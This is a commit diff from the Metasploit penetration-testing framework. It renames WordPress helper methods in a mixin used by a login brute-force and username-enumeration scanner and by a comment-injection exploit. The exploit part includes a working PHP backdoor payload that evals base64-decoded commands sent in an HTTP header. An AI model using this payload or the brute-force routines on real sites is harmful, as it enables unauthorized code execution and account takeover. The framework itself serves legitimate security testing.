implement @limhoff-r7 feedback
Christian Mehlmauer
parent
ffdd057f10
commit
2e9a579a08
|
|
@ -8,7 +8,6 @@ module Msf
|
|||
###
|
||||
module Exploit::Remote::Wordpress
|
||||
include Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
|
@ -24,7 +23,7 @@ module Msf
|
|||
# Checks if the site is online and running wordpress
|
||||
# @return [Boolean] Returns true if the site is online and running wordpress
|
||||
#
|
||||
def wp_wordpress_and_online?
|
||||
def wordpress_and_online?
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
|
|
@ -52,7 +51,7 @@ module Msf
|
|||
# Returns the Wordpress Login URL
|
||||
# @return [String] Wordpress Login URL
|
||||
#
|
||||
def wp_uri_login
|
||||
def wordpress_uri_login
|
||||
normalize_uri(target_uri.path, 'wp-login.php')
|
||||
end
|
||||
|
||||
|
|
@ -61,7 +60,7 @@ module Msf
|
|||
# @param post_id Post ID
|
||||
# @return [String] Wordpress Post URL
|
||||
#
|
||||
def wp_url_post(post_id)
|
||||
def wordpress_url_post(post_id)
|
||||
normalize_uri(target_uri.path) + "/?p=#{post_id}"
|
||||
end
|
||||
|
||||
|
|
@ -70,7 +69,7 @@ module Msf
|
|||
# @param author_id Author ID
|
||||
# @return [String] Wordpress Author URL
|
||||
#
|
||||
def wp_url_author(author_id)
|
||||
def wordpress_url_author(author_id)
|
||||
normalize_uri(target_uri.path) + "/?author=#{author_id}"
|
||||
end
|
||||
|
||||
|
|
@ -80,12 +79,12 @@ module Msf
|
|||
# @param pass Password
|
||||
# @return [String] the session cookie on successful login, nil otherwise
|
||||
#
|
||||
def wp_login(user, pass)
|
||||
def wordpress_login(user, pass)
|
||||
redirect = "#{target_uri}#{Rex::Text.rand_text_alpha(8)}"
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => wp_uri_login,
|
||||
'data' => _wp_login_post_data(user, pass, redirect),
|
||||
'uri' => wordpress_uri_login,
|
||||
'data' => wordpress_helper_login_post_data(user, pass, redirect),
|
||||
}, 20)
|
||||
|
||||
if res and res.code == 302 and res.headers['Location'] == redirect
|
||||
|
|
@ -103,11 +102,11 @@ module Msf
|
|||
# @param user Username
|
||||
# @return [Boolean] true if the user exists
|
||||
#
|
||||
def wp_user_exists?(user)
|
||||
def wordpress_user_exists?(user)
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => wp_uri_login,
|
||||
'data' => _wp_login_post_data(user, 'x'),
|
||||
'uri' => wordpress_uri_login,
|
||||
'data' => wordpress_helper_login_post_data(user, 'x'),
|
||||
}, 20)
|
||||
|
||||
exists = false
|
||||
|
|
@ -127,8 +126,8 @@ module Msf
|
|||
# @param user_id user_id
|
||||
# @return [String] the Username if it exists, nil otherwise
|
||||
#
|
||||
def wp_userid_exists?(user_id)
|
||||
url = wp_url_author(user_id)
|
||||
def wordpress_userid_exists?(user_id)
|
||||
url = wordpress_url_author(user_id)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => url
|
||||
|
|
@ -164,8 +163,8 @@ module Msf
|
|||
# @param login_cookie The valid login_cookie
|
||||
# @return [String] The location of the new comment/post
|
||||
#
|
||||
def wp_post_comment_auth(comment, comment_post_id, login_cookie)
|
||||
_wp_post_comment(comment, comment_post_id, login_cookie, nil, nil, nil)
|
||||
def wordpress_post_comment_auth(comment, comment_post_id, login_cookie)
|
||||
wordpress_helper_post_comment(comment, comment_post_id, login_cookie, nil, nil, nil)
|
||||
end
|
||||
|
||||
#
|
||||
|
|
@ -177,8 +176,8 @@ module Msf
|
|||
# @param url The author url
|
||||
# @return [String] The location of the new comment/post
|
||||
#
|
||||
def wp_post_comment_no_auth(comment, comment_post_id, author, email, url)
|
||||
_wp_post_comment(comment, comment_post_id, nil, author, email, url)
|
||||
def wordpress_post_comment_no_auth(comment, comment_post_id, author, email, url)
|
||||
wordpress_helper_post_comment(comment, comment_post_id, nil, author, email, url)
|
||||
end
|
||||
|
||||
#
|
||||
|
|
@ -186,8 +185,8 @@ module Msf
|
|||
# @param login_cookie If set perform the bruteforce as an authenticated user
|
||||
# @return [Integer] The post id, nil when nothing found
|
||||
#
|
||||
def wp_get_valid_post_id(login_cookie=nil)
|
||||
_wp_get_valid_post_id(false, login_cookie)
|
||||
def wordpress_get_valid_post_id(login_cookie=nil)
|
||||
wordpress_helper_get_valid_post_id(false, login_cookie)
|
||||
end
|
||||
|
||||
#
|
||||
|
|
@ -195,8 +194,8 @@ module Msf
|
|||
# @param login_cookie If set perform the bruteforce as an authenticated user
|
||||
# @return [Integer] The post id, nil when nothing found
|
||||
#
|
||||
def wp_get_valid_post_id_with_comments_enabled(login_cookie=nil)
|
||||
_wp_get_valid_post_id(true, login_cookie)
|
||||
def wordpress_get_valid_post_id_with_comments_enabled(login_cookie=nil)
|
||||
wordpress_helper_get_valid_post_id(true, login_cookie)
|
||||
end
|
||||
|
||||
#
|
||||
|
|
@ -205,8 +204,8 @@ module Msf
|
|||
# @param login_cookie If set perform the check as an authenticated user
|
||||
# @return [String] the HTTP response body of the post, nil otherwise
|
||||
#
|
||||
def wp_post_comments_enabled?(post_id, login_cookie=nil)
|
||||
_wp_check_post_id(wp_url_post(post_id), true, login_cookie)
|
||||
def wordpress_post_comments_enabled?(post_id, login_cookie=nil)
|
||||
wordpress_helper_check_post_id(wordpress_url_post(post_id), true, login_cookie)
|
||||
end
|
||||
|
||||
private
|
||||
|
|
@ -218,7 +217,7 @@ module Msf
|
|||
# @param redirect URL to redirect after successful login
|
||||
# @return [String] The post data
|
||||
#
|
||||
def _wp_login_post_data(user, pass, redirect=nil)
|
||||
def wordpress_helper_login_post_data(user, pass, redirect=nil)
|
||||
post_data = "log=#{Rex::Text.uri_encode(user.to_s)}"
|
||||
post_data << "&pwd=#{Rex::Text.uri_encode(pass.to_s)}"
|
||||
post_data << "&redirect_to=#{Rex::Text.uri_encode(redirect.to_s)}"
|
||||
|
|
@ -236,7 +235,7 @@ module Msf
|
|||
# @param url The author url
|
||||
# @return [String] The location of the new comment/post
|
||||
#
|
||||
def _wp_post_comment(comment, comment_post_id, login_cookie, author, email, url)
|
||||
def wordpress_helper_post_comment(comment, comment_post_id, login_cookie, author, email, url)
|
||||
vars_post = {
|
||||
'comment' => comment,
|
||||
'submit' => 'Post+Comment',
|
||||
|
|
@ -270,10 +269,10 @@ module Msf
|
|||
# @param login_cookie A valid login cookie to perform the bruteforce as an authenticated user
|
||||
# @return [Integer] The post id, nil when nothing found
|
||||
#
|
||||
def _wp_get_valid_post_id(comments_enabled=false, login_cookie=nil)
|
||||
def wordpress_helper_get_valid_post_id(comments_enabled=false, login_cookie=nil)
|
||||
(1..1000).each { |id|
|
||||
vprint_status("#{rhost}:#{rport} - Checking POST ID #{id}...") if (id % 100) == 0
|
||||
body = _wp_check_post_id(wp_url_post(id), comments_enabled, login_cookie)
|
||||
body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie)
|
||||
return id if body
|
||||
}
|
||||
# no post found
|
||||
|
|
@ -287,7 +286,7 @@ module Msf
|
|||
# @param login_cookie A valid login cookie to perform the check as an authenticated user
|
||||
# @return [String] the HTTP response body of the post, nil otherwise
|
||||
#
|
||||
def _wp_check_post_id(uri, comments_enabled=false, login_cookie=nil)
|
||||
def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil)
|
||||
options = {
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
|
|
@ -311,7 +310,7 @@ module Msf
|
|||
location = URI(res.headers['Location'])
|
||||
uri = location.path
|
||||
uri << "?#{location.query}" unless location.query.nil? or location.query.empty?
|
||||
return _wp_check_post_id(uri, comments_enabled)
|
||||
return wordpress_helper_check_post_id(uri, comments_enabled, login_cookie)
|
||||
end
|
||||
return nil
|
||||
end
|
||||
|
|
|
|||
|
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def run_host(ip)
|
||||
|
||||
unless wp_wordpress_and_online?
|
||||
unless wordpress_and_online?
|
||||
fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
|
||||
end
|
||||
|
||||
|
|
@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def do_enum(user=nil)
|
||||
print_status("#{target_uri} - WordPress Enumeration - Checking Username:'#{user}'")
|
||||
|
||||
exists = wp_user_exists?(user)
|
||||
exists = wordpress_user_exists?(user)
|
||||
if exists
|
||||
print_good("#{target_uri} - WordPress Enumeration- Username: '#{user}' - is VALID")
|
||||
report_auth_info(
|
||||
|
|
@ -125,7 +125,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def do_login(user=nil, pass=nil)
|
||||
vprint_status("#{target_uri} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'")
|
||||
|
||||
cookie = wp_login(user, pass)
|
||||
cookie = wordpress_login(user, pass)
|
||||
|
||||
if cookie
|
||||
print_good("#{target_uri} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'")
|
||||
|
|
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def enum_usernames
|
||||
usernames = []
|
||||
for i in datastore['RANGE_START']..datastore['RANGE_END']
|
||||
username = wp_userid_exists?(i)
|
||||
username = wordpress_userid_exists?(i)
|
||||
if username
|
||||
print_good "#{target_uri} - Found user '#{username}' with id #{i.to_s}"
|
||||
usernames << username
|
||||
|
|
|
|||
|
|
@ -82,9 +82,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
php_payload = "<!--mfunc if (sha1($_SERVER[HTTP_SUM]) == '#{@sum}' ) { eval(base64_decode($_SERVER[HTTP_CMD])); } --><!--/mfunc-->"
|
||||
|
||||
if @auth
|
||||
uri = wp_post_comment_auth(php_payload, @post_id, @cookie)
|
||||
uri = wordpress_post_comment_auth(php_payload, @post_id, @cookie)
|
||||
else
|
||||
uri = wp_post_comment_no_auth(php_payload,
|
||||
uri = wordpress_post_comment_no_auth(php_payload,
|
||||
@post_id,
|
||||
rand_text_alpha(8),
|
||||
"#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com",
|
||||
|
|
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
|
||||
unless wp_wordpress_and_online?
|
||||
unless wordpress_and_online?
|
||||
fail_with(Failure::NoTarget, "#{peer} does not seeem to be Wordpress site")
|
||||
end
|
||||
|
||||
|
|
@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if @auth
|
||||
print_status("#{peer} - Trying to login...")
|
||||
@cookie = wp_login(@user, @password)
|
||||
@cookie = wordpress_login(@user, @password)
|
||||
if @cookie.nil?
|
||||
fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")
|
||||
end
|
||||
|
|
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("#{peer} - Using the user supplied POST ID #{@post_id}...")
|
||||
else
|
||||
print_status("#{peer} - Trying to brute force a valid POST ID...")
|
||||
@post_id = wp_get_valid_post_id_with_comments_enabled
|
||||
@post_id = wordpress_get_valid_post_id_with_comments_enabled
|
||||
if @post_id.nil?
|
||||
fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")
|
||||
else
|
||||
|
|
@ -151,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
unless wp_wordpress_and_online?
|
||||
unless wordpress_and_online?
|
||||
print_error("#{peer} does not seeem to be Wordpress site")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue